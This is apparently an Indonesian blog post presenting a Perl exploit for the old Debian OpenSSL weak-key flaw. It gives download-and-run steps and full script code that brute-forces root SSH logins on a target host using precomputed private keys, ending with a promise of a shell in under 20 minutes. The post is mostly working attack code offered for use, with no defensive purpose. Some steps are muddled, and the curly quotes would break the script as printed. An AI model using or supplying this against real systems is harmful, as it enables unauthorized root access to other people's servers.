Debian OpenSSL BruteForce SSH Exploit
Exploit ini hanya untuk debian yg belum di patched, di tulis menggunakan bahasa perl, untuk berita lengkap tentang bug pada debian yg ditemukan bisa di liat dari situs metasploit
Here we Go !!
1. Download exploit’a dari sini
2. Extract ke dalam directory yg di tentukan
3. Masuk ke dalam /root/.ssh/authorized_keys lalu generated exploit SSH RSA key 2048 Bits tadi, exploit ini akan mem by-pass SSH key
4. Jalankan script perl dan arahkan pada lokasi dimana tempat lo extracted exploit tadi
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print “Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n”;
print “Example: ./exploiter.pl /root/keys/ 127.0.0.1\n”;
print “By mm@deadbeef.de\n”;
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(”opendir”);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system(”echo “.join(” “, @a).”; ssh -l root “.join(” “, map { “-i
“.$_ } @a).” “.$ARGV[1]);
@a = ();
}
}
5. Bingo !! Nikmati Shell yg lo dapet kurang dalam waktu 20 menit
0 komentar:
